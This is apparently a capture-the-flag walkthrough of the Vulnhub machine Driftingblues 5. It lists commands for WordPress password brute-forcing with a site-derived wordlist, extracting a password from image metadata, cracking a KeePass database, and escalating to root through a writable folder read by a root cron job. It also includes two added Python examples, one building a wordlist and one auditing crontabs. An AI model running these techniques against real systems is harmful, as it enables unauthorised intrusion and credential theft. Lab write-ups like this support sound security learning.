Vulnhub – Driftingblues 5 – Walkthrough – Writeup
We are going to look into an easy machine from Vulnhub, Driftingblues 5. We have already completed four machines from the series, so make sure you check them out.
Vulnhub – Driftingblues 4 – Walkthrough
Driftingblues 5: https://www.vulnhub.com/entry/driftingblues-5,662/
Foothold
Firstly, we are going to identify the IP address of the target. We can use fping or netdiscover for this purpose.
fping -aqg 10.0.2.0/24

Secondly, we can do port scanning using nmap.
ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.13 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//') && nmap -p$ports -sC -sV 10.0.2.13

It looks like we have a WordPress website to enumerate. For that, we can use wpscan.
wpscan --url http://10.0.2.13 --detection-mode aggressive -e --passwords=/home/kali/rockyou.txt
For an easy challenge like Driftingblues, we got 5 users. However, if we use the rockyou.txt wordlist, the brute force would take a very long time to complete, so we are not going to pursue it. I am sure we would get a valid password even if we used it.

A point to note is that Driftingblues is a series of challenges. Since we have already covered some basic tools in previous challenges, I suppose the creator is trying to use a different approach. One of the important cues in CTF challenges is information hidden somewhere in the website or on the server. In this case, I ran gobuster to find any possible files, but I had no luck. So, the only thing remaining is to generate a wordlist from the WordPress site itself, and we have the CeWL tool for this purpose.
cewl -m 6 -w drift.txt http://10.0.2.13
Since WordPress requires a minimum password length of 6 characters, we use the same value for the minimum word length (-m) in our command. We store the words in a file called drift.txt. By default, the depth of recursion is 2; if the wordlist doesn't work, we will increase it by one and regenerate the list.
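Added example, not the write-up's code and not CeWL itself: a small Python crawler that applies the same two knobs, minimum word length and link depth, to a constructed in-memory site, plus the check a site owner can run to reject passwords that are just words lifted from the public site. The URLs and page text are constructed.

```python
import re
from html.parser import HTMLParser

# Constructed in-memory "site" standing in for HTTP responses (hypothetical URLs and text).
SITE = {
    "http://example.test/": '<h1>Drifting Blues</h1><p>Welcome to our surreal blog '
                            'about oceans.</p><a href="/post1">post</a>',
    "http://example.test/post1": '<p>The fractured coastline near the closet.</p>'
                                 '<a href="/post2">next</a>',
    "http://example.test/post2": '<p>Exalted buddies sail beyond reach.</p>',
}

class _Extractor(HTMLParser):
    """Collects visible text and <a href> targets from one page."""
    def __init__(self):
        super().__init__()
        self.text, self.links = [], []
    def handle_data(self, data):
        self.text.append(data)
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.links += [v for k, v in attrs if k == "href" and v]

def fetch(url):
    # Stand-in for an HTTP GET; returns "" for unknown URLs.
    return SITE.get(url, "")

def build_wordlist(start, min_len=6, depth=2, fetch=fetch):
    """Words of at least min_len letters from `start` and pages up to `depth` link hops away
    (the same idea as CeWL's -m and -d parameters)."""
    base, seen, words, frontier = start.rstrip("/"), set(), set(), [(start, 0)]
    while frontier:
        url, d = frontier.pop(0)
        if url in seen:
            continue
        seen.add(url)
        page = _Extractor()
        page.feed(fetch(url))
        words.update(w for w in re.findall(r"[A-Za-z]+", " ".join(page.text)) if len(w) >= min_len)
        if d < depth:  # only follow links while still above the depth limit
            frontier += [(h if h.startswith("http") else base + h, d + 1) for h in page.links]
    return sorted(words)

def password_derived_from_site(password, wordlist):
    """Policy check for site owners: True if the password is just a word from the public site (case-insensitive)."""
    return password.lower() in {w.lower() for w in wordlist}
```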
After the file is generated, we run the previous wpscan command again with the new wordlist file.
wpscan --url http://10.0.2.13 --detection-mode aggressive -e u -P drift.txt

We got a valid combination for the user gill, and the brute force ran for more than 3 minutes. However, when I logged in to the website, I found that the user isn't an admin. Hence, we cannot edit code to add a reverse shell. We are going to enumerate WordPress further.

When I went through the media library, I found that the boxed image is not present in any of the blog posts. So, maybe it has some EXIF tags. Hence, we are going to download the file.
exiftool dblogo.png

So, it looks like we got the password. However, there is extra information that the password may not be in lowercase. Hence, we first try the password in lowercase, and if it doesn't work we will create our own wordlist using hashcat rules.
ssh gill@10.0.2.13

We got the shell, so there is no need to generate our own wordlist.

So, we got our user and its flag.
Privilege Escalation to Root
ls -al
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null # search for suid binaries

I ran a Python HTTP server on the target and downloaded the KeePass file to my local machine.
On target machine:
python3 -m http.server 8080
On local machine:
wget http://10.0.2.13:8080/keyfile.kdbx
Then, we can use the keepass2john tool to extract a hash of the KeePass database's master password.
keepass2john keyfile.kdbx | tee hash


I tried switching to the root user with that password, but it didn't work. So, I will use a web-based KeePass client to view the stored passwords.
Link to the web client for opening the KeePass database: https://app.keeweb.info/

There are some possible candidates for the keys. I tried all of them as the root password, but none of them worked.
Now, I will do Linux enumeration using linpeas.sh. Please see previous blogs for how to do it.
./linpeas.sh | tee output | more


There is an unexpected item in the root directory. Also, some files modified in the last 5 minutes are related to authentication and keys. So, there is a possibility of a cron job running every few minutes. Hence, we are going to use pspy to snoop on the processes.
ls -al /

We found that users other than root can write to this directory.
Meanwhile, we can run pspy in another window.
./pspy64
I put the keys in a new file, one per line, so that I can run a command to create files named after each credential.
nano keys
# put keys here
# run a command to touch files
while read key; do touch "$key"; done < keys
Now we have created blank files named after the keys. Next, we wait for the next cron job run.

After the command is executed by the cron job, we list the files in the keyfolder. However, nothing happened in the directory, so it seems we might have to keep only one file in the directory at a time. Let's move the keys file to another directory, run the previous command there, and copy those files over one by one, waiting for the cron job between attempts.
mv keys /tmp/
rm *
cd /tmp
while read key; do touch "$key"; done < keys
# attempt 1
mv 2real4surreal /keyfolder/
ls -al /keyfolder # not successful
rm /keyfolder/*
# attempt 2
mv buddyretard /keyfolder/
ls -al /keyfolder # not successful
rm /keyfolder/*
# attempt 3
mv closet313 /keyfolder/
ls -al /keyfolder # not successful
rm /keyfolder/*
# attempt 4
mv exalted /keyfolder/
ls -al /keyfolder # not successful
rm /keyfolder/*
# attempt 5
mv fracturedocean /keyfolder/
ls -al /keyfolder # SUCCESSFUL
cd /keyfolder
cat rootcreds.txt

We actually got the root credentials from that file and hence the root flag as well.
su root
cd /root
ls -al
cat root.txt
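Added example, not from the write-up: the defender's takeaway of this escalation is a root cron job consuming files from a directory that non-root users can write to. This Python audit scans system-crontab lines for absolute paths in root's commands and reports those writable by group or world; the crontab line, job path and temporary directory are constructed.

```python
import os
import stat
import tempfile

def writable_by_others(path):
    """True if group or world hold write permission on `path` (the /keyfolder condition above)."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text, check=writable_by_others):
    """Scan system-crontab lines (m h dom mon dow user command) and return the
    absolute paths in root's commands that non-root users can write to."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[5] != "root":
            continue  # only root jobs matter for a root-level takeover
        for token in fields[6].split():
            if token.startswith("/") and check(token):
                findings.append(token)
    return findings

def demo():
    """Self-contained check on a temporary directory (constructed, hypothetical job path)."""
    with tempfile.TemporaryDirectory() as tmp:
        keyfolder = os.path.join(tmp, "keyfolder")
        os.mkdir(keyfolder)
        os.chmod(keyfolder, 0o777)  # the misconfiguration: anyone can drop files here
        cron = f"# m h dom mon dow user command\n*/5 * * * * root /usr/local/bin/keycheck.sh {keyfolder}\n"
        loose = audit_crontab(cron)
        os.chmod(keyfolder, 0o755)  # the fix: only the owner (root) may write
        tight = audit_crontab(cron)
    return loose == [keyfolder] and tight == []
```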

Conclusion
This was a somewhat difficult challenge in my view. It had a lot of guessing games, such as getting credentials from the website, credentials from an image, and the way to escalate privileges. Although frustrating, the machine is quite good for learning.